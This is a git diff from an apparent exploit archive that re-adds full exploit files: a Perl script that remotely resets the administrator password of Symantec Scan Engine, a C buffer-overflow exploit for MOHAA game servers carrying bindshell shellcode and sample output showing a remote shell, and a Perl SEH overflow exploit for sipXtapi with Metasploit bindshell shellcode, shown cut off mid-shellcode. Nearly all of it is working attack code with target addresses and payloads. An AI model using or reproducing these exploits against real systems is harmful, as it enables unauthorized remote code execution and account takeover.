--- a/platforms/windows/remote/1703.pl
+++ b/platforms/windows/remote/1703.pl
@@ -1,243 +1,243 @@
-#!/usr/bin/perl -w
-#
-# Remotely change the administrator password (or password hash) of
-# Symantec Scan Engine.
-#
-# Author: Marc Bevand of Rapid7 
-# Copyright 2006 Rapid7, LLC. All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without
-# modification, are permitted provided that the following conditions
-# are met:
-#
-#   1. Redistributions of source code must retain the above copyright
-#   notice, this list of conditions and the following disclaimer.
-#
-#   2. Redistributions in binary form must reproduce the above
-#   copyright notice, this list of conditions and the following
-#   disclaimer in the documentation and/or other materials provided
-#   with the distribution.
-#
-#   THIS SOFTWARE IS PROVIDED BY RAPID7, LLC ``AS IS'' AND ANY EXPRESS
-#   OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-#   WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-#   ARE DISCLAIMED. IN NO EVENT SHALL RAPID7, LLC BE LIABLE FOR ANY
-#   DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-#   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
-#   GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
-#   INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
-#   WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-#   NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-#   SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-#
-
-use strict;
-use Getopt::Long;
-use LWP::UserAgent;
-use Digest::MD5 qw/md5_hex/;
-use Net::SSLeay::Handle qw/shutdown/;
-
-#
-# Init LWP::UserAgent (the user agent string is the one currently used
-# by the Scan Engine java applet).
-#
-sub init {
-  my $ua;
-  $ua = LWP::UserAgent->new(keep_alive => 0);
-  $ua->agent("Mozilla/4.0 (Windows 2000 5.0) Java/1.4.2_08");
-  return $ua;
-}
-
-#
-# Example of service string to be parsed:
-# 10.68.4.4
-# 10.68.4.4/8004/8005
-# hostname
-# hostname/9004/9005
-#
-sub parse_service {
-  my ($service) = @_;
-
-  if ($service =~ m{^([^/]*)/(\d+)/(\d+)$}) {
-     return $1, $2, $3;
-  } elsif ($service =~ m{^([^/]*)$}) {
-     return $1, 8004, 8005;
-  } else {
-     die "cannot parse service: $service";
-  }
-}
-
-#
-# Sends a request to obtain the password hash. Note: the RSA key
-# (modulus and public exponent) has been randomly chosen.
-#
-sub data_to_send {
-  my $r1 =
-  'I need the key'
-  ;
-
-  return $r1;
-}
-
-#
-# Example of response to be parsed:
-# 
-#   
-#   
-# 
-#
-sub parse_resp {
-  my ($res) = @_;
-
-  if ($res =~ /pass="([[:xdigit:]]{64})"/) {
-     return $1;
-  } else {
-     die "cannot parse response: $res";
-  }
-}
-
-#
-# Return a password hash.
-#
-sub hash_passwd {
-  my ($pwd) = @_;
-  my $salt = sprintf "%08X%08X%08X%08X", rand(0xffffffff),
-  rand(0xffffffff), rand(0xffffffff), rand(0xffffffff);
-
-  return uc(md5_hex("$pwd$salt")) . $salt;
-}
-
-sub send_request {
-  my ($socket, $req) = @_;
-
-  $req = pack("n", length($req)).$req;
-  print $socket $req;
-}
-
-#
-# Set the administrator password hash.
-#
-sub set_hash {
-  my ($hostname, $port_ssl, $hash) = @_;
-  my $socket;
-  my $reply;
-
-  tie(*SSL, "Net::SSLeay::Handle", $hostname, $port_ssl)
-     or die "ssl tie: $!";
-  $socket = \*SSL;
-  send_request($socket,
-     ''.
-     ''.
-     ''.
-     ''.
-     ''.
-     ']]>');
-  send_request($socket,
-     'UTFWritesDone');
-  shutdown($socket, 1) or die "ssl shutdown: $!";
-  $reply = substr(<$socket>, 2);
-  $reply = substr($reply, 0, index($reply, 'UTFWritesDone') - 2);
-  if ($reply !~ m{Apply!})
-  {
-     die "command failed: $reply";
-  }
-  close($socket) or die "ssl close: $!";
-}
-
-sub doit {
-  my ($service, $pwd, $hash) = @_;
-  my $hostname;
-  my $port_http;
-  my $port_ssl;
-  my $ua;
-  my $url;
-  my $req;
-  my $res;
-  my $old_hash;
-
-  ($hostname, $port_http, $port_ssl) = parse_service($service);
-  $ua = init();
-  $url = "http://$hostname:$port_http/xml.xml";
-  $req = HTTP::Request->new(POST => $url);
-  $req->content_type('application/x-www-form-urlencoded');
-  $req->content(data_to_send());
-  $res = $ua->request($req);
-  $res->is_success or die "got ".$res->status_line." for $url\n";
-  ($old_hash) = parse_resp($res->content);
-  print "Old hash: $old_hash\n";
-  if ($hash) {
-     set_hash($hostname, $port_ssl, $hash);
-     print "New hash: $hash\n";
-  } else {
-     $hash = hash_passwd($pwd);
-     set_hash($hostname, $port_ssl, $hash);
-     print "New hash: $hash\n";
-     print "Password successfully set to: '$pwd'\n";
-  }
-}
-
-sub error {
-  print STDERR "Try `$0 --help' for more information.\n";
-}
-
-sub usage {
-  print "Usage:\n".
-  "  $0 [OPTIONS] \n".
-  "  $0 [OPTIONS] //\n".
-  "Options:\n".
-  "  --help                Display this help\n".
-  "  --pwd         Set the password (default: test)\n".
-  "  --hash   Set the password hash instead of a parti".
-  "cular password\n".
-  "Examples:\n".
-  "  $0 10.68.4.4\n".
-  "  $0 --pwd foobar 10.68.4.4/8004/8005\n".
-  "";
-}
-
-sub main {
-  my $help;
-  my $pwd = "test";
-  my $hash;
-  my $service;
-
-  if (!GetOptions(
-        "help" => \$help,
-        "pwd=s" => \$pwd,
-        "hash=s" => \$hash,
-     )) {
-     error(); exit(1);
-  }
-  if ($help) {
-     usage(); exit(0);
-  }
-  if (!scalar(@ARGV)) {
-     print STDERR "No service specified.\n";
-     error(); exit(1);
-  } elsif (1 == scalar(@ARGV)) {
-     $service = $ARGV[0];
-  } else {
-     print STDERR "Extra argument: $ARGV[1]\n";
-     error(); exit(1);
-  }
-  doit($service, $pwd, $hash);
-}
-
-main();
-
-#
-# END proof of concept
-#
-
-# milw0rm.com [2006-04-21]
+#!/usr/bin/perl -w
+#
+# Remotely change the administrator password (or password hash) of
+# Symantec Scan Engine.
+#
+# Author: Marc Bevand of Rapid7 
+# Copyright 2006 Rapid7, LLC. All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions
+# are met:
+#
+#   1. Redistributions of source code must retain the above copyright
+#   notice, this list of conditions and the following disclaimer.
+#
+#   2. Redistributions in binary form must reproduce the above
+#   copyright notice, this list of conditions and the following
+#   disclaimer in the documentation and/or other materials provided
+#   with the distribution.
+#
+#   THIS SOFTWARE IS PROVIDED BY RAPID7, LLC ``AS IS'' AND ANY EXPRESS
+#   OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+#   WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+#   ARE DISCLAIMED. IN NO EVENT SHALL RAPID7, LLC BE LIABLE FOR ANY
+#   DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+#   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
+#   GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+#   INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+#   WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+#   NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+#   SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+#
+
+use strict;
+use Getopt::Long;
+use LWP::UserAgent;
+use Digest::MD5 qw/md5_hex/;
+use Net::SSLeay::Handle qw/shutdown/;
+
+#
+# Init LWP::UserAgent (the user agent string is the one currently used
+# by the Scan Engine java applet).
+#
+sub init {
+  my $ua;
+  $ua = LWP::UserAgent->new(keep_alive => 0);
+  $ua->agent("Mozilla/4.0 (Windows 2000 5.0) Java/1.4.2_08");
+  return $ua;
+}
+
+#
+# Example of service string to be parsed:
+# 10.68.4.4
+# 10.68.4.4/8004/8005
+# hostname
+# hostname/9004/9005
+#
+sub parse_service {
+  my ($service) = @_;
+
+  if ($service =~ m{^([^/]*)/(\d+)/(\d+)$}) {
+     return $1, $2, $3;
+  } elsif ($service =~ m{^([^/]*)$}) {
+     return $1, 8004, 8005;
+  } else {
+     die "cannot parse service: $service";
+  }
+}
+
+#
+# Sends a request to obtain the password hash. Note: the RSA key
+# (modulus and public exponent) has been randomly chosen.
+#
+sub data_to_send {
+  my $r1 =
+  'I need the key'
+  ;
+
+  return $r1;
+}
+
+#
+# Example of response to be parsed:
+# 
+#   
+#   
+# 
+#
+sub parse_resp {
+  my ($res) = @_;
+
+  if ($res =~ /pass="([[:xdigit:]]{64})"/) {
+     return $1;
+  } else {
+     die "cannot parse response: $res";
+  }
+}
+
+#
+# Return a password hash.
+#
+sub hash_passwd {
+  my ($pwd) = @_;
+  my $salt = sprintf "%08X%08X%08X%08X", rand(0xffffffff),
+  rand(0xffffffff), rand(0xffffffff), rand(0xffffffff);
+
+  return uc(md5_hex("$pwd$salt")) . $salt;
+}
+
+sub send_request {
+  my ($socket, $req) = @_;
+
+  $req = pack("n", length($req)).$req;
+  print $socket $req;
+}
+
+#
+# Set the administrator password hash.
+#
+sub set_hash {
+  my ($hostname, $port_ssl, $hash) = @_;
+  my $socket;
+  my $reply;
+
+  tie(*SSL, "Net::SSLeay::Handle", $hostname, $port_ssl)
+     or die "ssl tie: $!";
+  $socket = \*SSL;
+  send_request($socket,
+     ''.
+     ''.
+     ''.
+     ''.
+     ''.
+     ']]>');
+  send_request($socket,
+     'UTFWritesDone');
+  shutdown($socket, 1) or die "ssl shutdown: $!";
+  $reply = substr(<$socket>, 2);
+  $reply = substr($reply, 0, index($reply, 'UTFWritesDone') - 2);
+  if ($reply !~ m{Apply!})
+  {
+     die "command failed: $reply";
+  }
+  close($socket) or die "ssl close: $!";
+}
+
+sub doit {
+  my ($service, $pwd, $hash) = @_;
+  my $hostname;
+  my $port_http;
+  my $port_ssl;
+  my $ua;
+  my $url;
+  my $req;
+  my $res;
+  my $old_hash;
+
+  ($hostname, $port_http, $port_ssl) = parse_service($service);
+  $ua = init();
+  $url = "http://$hostname:$port_http/xml.xml";
+  $req = HTTP::Request->new(POST => $url);
+  $req->content_type('application/x-www-form-urlencoded');
+  $req->content(data_to_send());
+  $res = $ua->request($req);
+  $res->is_success or die "got ".$res->status_line." for $url\n";
+  ($old_hash) = parse_resp($res->content);
+  print "Old hash: $old_hash\n";
+  if ($hash) {
+     set_hash($hostname, $port_ssl, $hash);
+     print "New hash: $hash\n";
+  } else {
+     $hash = hash_passwd($pwd);
+     set_hash($hostname, $port_ssl, $hash);
+     print "New hash: $hash\n";
+     print "Password successfully set to: '$pwd'\n";
+  }
+}
+
+sub error {
+  print STDERR "Try `$0 --help' for more information.\n";
+}
+
+sub usage {
+  print "Usage:\n".
+  "  $0 [OPTIONS] \n".
+  "  $0 [OPTIONS] //\n".
+  "Options:\n".
+  "  --help                Display this help\n".
+  "  --pwd         Set the password (default: test)\n".
+  "  --hash   Set the password hash instead of a parti".
+  "cular password\n".
+  "Examples:\n".
+  "  $0 10.68.4.4\n".
+  "  $0 --pwd foobar 10.68.4.4/8004/8005\n".
+  "";
+}
+
+sub main {
+  my $help;
+  my $pwd = "test";
+  my $hash;
+  my $service;
+
+  if (!GetOptions(
+        "help" => \$help,
+        "pwd=s" => \$pwd,
+        "hash=s" => \$hash,
+     )) {
+     error(); exit(1);
+  }
+  if ($help) {
+     usage(); exit(0);
+  }
+  if (!scalar(@ARGV)) {
+     print STDERR "No service specified.\n";
+     error(); exit(1);
+  } elsif (1 == scalar(@ARGV)) {
+     $service = $ARGV[0];
+  } else {
+     print STDERR "Extra argument: $ARGV[1]\n";
+     error(); exit(1);
+  }
+  doit($service, $pwd, $hash);
+}
+
+main();
+
+#
+# END proof of concept
+#
+
+# milw0rm.com [2006-04-21]
diff --git a/platforms/windows/remote/1776.c b/platforms/windows/remote/1776.c
index 94b049222..0eeed97b3 100755
--- a/platforms/windows/remote/1776.c
+++ b/platforms/windows/remote/1776.c
@@ -1,188 +1,188 @@
-/*
-MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
-Written by RunningBon
-
-Please use this responsibly, as I am not responsible for any damage you cause by using it.
-
-IRC: irc.rizon.net #kik
-E-mail: runningbon@gmail.com
-
-Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
-
-Example:
-
-C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
-MoHAA Server Buffer overflow exploit
-Written by RunningBon
-E-Mail: runningbon@gmail.com
-IRC: irc.rizon.net #kik
-
-Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
-Building packet.
-Sending packet.
-Packet sent.
-Check for your shell on port 4444.
-
-C:\>telnet 192.168.2.44 4444
-Microsoft Windows XP [Version 5.1.2600]
-(C) Copyright 1985-2001 Microsoft Corp.
-
-C:\Program Files\EA GAMES\MOHAA>
-*/
-#include 
-#include 
-
-struct VersionStruct {
-    char *pName;
-    DWORD dwNewEIP;
-    DWORD dwFillLength;
-};
-
-VersionStruct Versions[] = {
-    "MOHAA-v1.11", 0xCBB935, 516,
-    "MOHAA:S-v2.15", 0x923575, 516,
-    //Add MOHAA:Breakthrough support
-};
-
-#pragma comment (lib, "ws2_32.lib")
-
-//Port 4444 bindshell
-unsigned char szShellcode[] =
-"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
-"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
-"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
-"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
-"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
-"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
-"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
-"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
-"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
-"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
-"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
-"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
-"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
-"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
-"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
-"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
-"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
-"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
-"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
-"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
-"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
-"\x11\x13\x38\x7e\x92\xec\xee\x81";
-
-void Error(char *pString)
-{
-    printf("[ERROR] %s\n", pString);
-    ExitProcess(0);
-}
-
-int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
-{
-    WSAData WSADATA;
-    SOCKET Socket = NULL;
-    sockaddr_in SockAddr;
-    char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
-    char szBuffer[4096];
-    int iLen = 0;
-
-    WSAStartup(MAKEWORD(1, 1), &WSADATA);
-
-    if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
-    {
-        Error("socket()");
-        return 0;
-    }
-
-    SockAddr.sin_addr.s_addr = inet_addr(pIP);
-    SockAddr.sin_port = htons(iPort);
-    SockAddr.sin_family = AF_INET;
-
-    printf("Building packet.\n");
-
-    memset(szBuffer, 0, sizeof(szBuffer));
-
-    memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
-    iLen += sizeof(szHeader) - 1;
-
-    memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
-    iLen += pVersion->dwFillLength;
-
-    memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
-    iLen += sizeof(DWORD);
-
-    memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
-    iLen += sizeof(szShellcode);
-
-    printf("Sending packet.\n");
-
-    if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
-    {
-        Error("sendto()");
-        return 0;
-    }
-
-    printf("Packet sent.\n");
-
-    return 1;
-}
-
-void PrintWelcome()
-{
-    printf(
-    "MoHAA Server Buffer overflow exploit\n"
-    "Written by RunningBon\n"
-    "E-Mail: runningbon@gmail.com\n"
-    "IRC: irc.rizon.net #kik\n"
-    "\n"
-    );
-}
-
-void PrintUsage(char *pPath)
-{
-    printf("Usage: %s   \n\n", pPath);
-
-    printf("Supported Version List:\n");
-    for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
-    {
-        printf("%s\n", Versions[i].pName);
-    }
-}
-
-int main(int argc, char **argv)
-{
-    VersionStruct *pVersion = NULL;
-
-    PrintWelcome();
-
-    if(argc < 4)
-    {
-        PrintUsage(argv[0]);
-        return 0;
-    }
-
-    for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
-    {
-        if(!stricmp(argv[3], Versions[i].pName))
-        {
-            pVersion = &Versions[i];
-            break;
-        }
-    }
-
-    if(pVersion == NULL)
-    {
-        Error("Invalid version.");
-    }
-
-    printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);
-
-    if(Exploit(argv[1], atoi(argv[2]), pVersion))
-    {
-        printf("Check for your shell on port 4444.\n");
-    }
-
-    return 0;
-}
-
-// milw0rm.com [2006-05-10]
+/*
+MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
+Written by RunningBon
+
+Please use this responsibly, as I am not responsible for any damage you cause by using it.
+
+IRC: irc.rizon.net #kik
+E-mail: runningbon@gmail.com
+
+Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
+
+Example:
+
+C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
+MoHAA Server Buffer overflow exploit
+Written by RunningBon
+E-Mail: runningbon@gmail.com
+IRC: irc.rizon.net #kik
+
+Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
+Building packet.
+Sending packet.
+Packet sent.
+Check for your shell on port 4444.
+
+C:\>telnet 192.168.2.44 4444
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\Program Files\EA GAMES\MOHAA>
+*/
+#include 
+#include 
+
+struct VersionStruct {
+    char *pName;
+    DWORD dwNewEIP;
+    DWORD dwFillLength;
+};
+
+VersionStruct Versions[] = {
+    "MOHAA-v1.11", 0xCBB935, 516,
+    "MOHAA:S-v2.15", 0x923575, 516,
+    //Add MOHAA:Breakthrough support
+};
+
+#pragma comment (lib, "ws2_32.lib")
+
+//Port 4444 bindshell
+unsigned char szShellcode[] =
+"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
+"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
+"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
+"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
+"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
+"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
+"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
+"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
+"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
+"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
+"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
+"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
+"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
+"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
+"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
+"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
+"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
+"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
+"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
+"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
+"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
+"\x11\x13\x38\x7e\x92\xec\xee\x81";
+
+void Error(char *pString)
+{
+    printf("[ERROR] %s\n", pString);
+    ExitProcess(0);
+}
+
+int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
+{
+    WSAData WSADATA;
+    SOCKET Socket = NULL;
+    sockaddr_in SockAddr;
+    char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
+    char szBuffer[4096];
+    int iLen = 0;
+
+    WSAStartup(MAKEWORD(1, 1), &WSADATA);
+
+    if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
+    {
+        Error("socket()");
+        return 0;
+    }
+
+    SockAddr.sin_addr.s_addr = inet_addr(pIP);
+    SockAddr.sin_port = htons(iPort);
+    SockAddr.sin_family = AF_INET;
+
+    printf("Building packet.\n");
+
+    memset(szBuffer, 0, sizeof(szBuffer));
+
+    memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
+    iLen += sizeof(szHeader) - 1;
+
+    memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
+    iLen += pVersion->dwFillLength;
+
+    memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
+    iLen += sizeof(DWORD);
+
+    memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
+    iLen += sizeof(szShellcode);
+
+    printf("Sending packet.\n");
+
+    if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
+    {
+        Error("sendto()");
+        return 0;
+    }
+
+    printf("Packet sent.\n");
+
+    return 1;
+}
+
+void PrintWelcome()
+{
+    printf(
+    "MoHAA Server Buffer overflow exploit\n"
+    "Written by RunningBon\n"
+    "E-Mail: runningbon@gmail.com\n"
+    "IRC: irc.rizon.net #kik\n"
+    "\n"
+    );
+}
+
+void PrintUsage(char *pPath)
+{
+    printf("Usage: %s   \n\n", pPath);
+
+    printf("Supported Version List:\n");
+    for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
+    {
+        printf("%s\n", Versions[i].pName);
+    }
+}
+
+int main(int argc, char **argv)
+{
+    VersionStruct *pVersion = NULL;
+
+    PrintWelcome();
+
+    if(argc < 4)
+    {
+        PrintUsage(argv[0]);
+        return 0;
+    }
+
+    for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
+    {
+        if(!stricmp(argv[3], Versions[i].pName))
+        {
+            pVersion = &Versions[i];
+            break;
+        }
+    }
+
+    if(pVersion == NULL)
+    {
+        Error("Invalid version.");
+    }
+
+    printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);
+
+    if(Exploit(argv[1], atoi(argv[2]), pVersion))
+    {
+        printf("Check for your shell on port 4444.\n");
+    }
+
+    return 0;
+}
+
+// milw0rm.com [2006-05-10]
diff --git a/platforms/windows/remote/20.txt b/platforms/windows/remote/20.txt
index 58a936a5d..67232b830 100755
--- a/platforms/windows/remote/20.txt
+++ b/platforms/windows/remote/20.txt
@@ -313,6 +313,6 @@ extern pstring global_myname;
 +
 int am_parent = 1;
 
-/* the last message the was processed */
-
-# milw0rm.com [2003-04-25]
+/* the last message the was processed */
+
+# milw0rm.com [2003-04-25]
diff --git a/platforms/windows/remote/2070.pl b/platforms/windows/remote/2070.pl
index ea073ba59..caa827cdc 100755
--- a/platforms/windows/remote/2070.pl
+++ b/platforms/windows/remote/2070.pl
@@ -1,83 +1,83 @@
-#!/usr/bin/perl
-# 
-# Remote Buffer Overflow in sipXtapi
-# 
-# bad char 0x00 0x09 0x0a 0x0d 0x20
-#
-
-
-use IO::Socket;
-#use strict;
-
-print "\n\n";
-print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaro\n\n";
-print "tested on sipXphone 2.6.0.27 read the code for ret address\n\n";
-
-if (not $ARGV[0]) {
-        print "Usage: sipx.pl \n";
-exit;}
-
-$target=$ARGV[0];
-my $source ="127.0.0.1";
-my $target_port = 5060;
-my $user ="bad";
-my $nextseh = "\xeb\x06\x90\x90";
-my $seh="\xb0\x67\x01\x08";	# pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ?
-#my $seh="\x27\x13\x02\x08";	# call ebx in jvm.dll for win2k Pro SP0 Italian universal ?
-#my $seh="\x22\x92\x06\x08";	# jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ? 
-				# if you use this ret you can exploits the target host many times
-my $nop = "\x90"x32;
-
-
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode = 
-"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25".
-"\xe3\xa5\x9f\x83\xeb\xfc\xe2\xf4\xd9\x89\x4e\xd2\xcd\x1a\x5a\x60".
-"\xda\x83\x2e\xf3\x01\xc7\x2e\xda\x19\x68\xd9\x9a\x5d\xe2\x4a\x14".
-"\x6a\xfb\x2e\xc0\x05\xe2\x4e\xd6\xae\xd7\x2e\x9e\xcb\xd2\x65\x06".
-"\x89\x67\x65\xeb\x22\x22\x6f\x92\x24\x21\x4e\x6b\x1e\xb7\x81\xb7".
-"\x50\x06\x2e\xc0\x01\xe2\x4e\xf9\xae\xef\xee\x14\x7a\xff\xa4\x74".
-"\x26\xcf\x2e\x16\x49\xc7\xb9\xfe\xe6\xd2\x7e\xfb\xae\xa0\x95\x14".
-"\x65\xef\x2e\xef\x39\x4e\x2e\xdf\x2d\xbd\xcd\x11\x6b\xed\x49\xcf".
-"\xda\x35\xc3\xcc\x43\x8b\x96\xad\x4d\x94\xd6\xad\x7a\xb7\x5a\x4f".
-"\x4d\x28\x48\x63\x1e\xb3\x5a\x49\x7a\x6a\x40\xf9\xa4\x0e\xad\x9d".
-"\x70\x89\xa7\x60\xf5\x8b\x7c\x96\xd0\x4e\xf2\x60\xf3\xb0\xf6\xcc".
-"\x76\xb0\xe6\xcc\x66\xb0\x5a\x4f\x43\x8b\xb4\xc3\x43\xb0\x2c\x7e".
-"\xb0\x8b\x01\x85\x55\x24\xf2\x60\xf3\x89\xb5\xce\x70\x1c\x75\xf7".
-"\x81\x4e\x8b\x76\x72\x1c\x73\xcc\x70\x1c\x75\xf7\xc0\xaa\x23\xd6".
-"\x72\x1c\x73\xcf\x71\xb7\xf0\x60\xf5\x70\xcd\x78\x5c\x25\xdc\xc8".
-"\xda\x35\xf0\x60\xf5\x85\xcf\xfb\x43\x8b\xc6\xf2\xac\x06\xcf\xcf".
-"\x7c\xca\x69\x16\xc2\x89\xe1\x16\xc7\xd2\x65\x6c\x8f\x1d\xe7\xb2".
-"\xdb\xa1\x89\x0c\xa8\x99\x9d\x34\x8e\x48\xcd\xed\xdb\x50\xb3\x60".
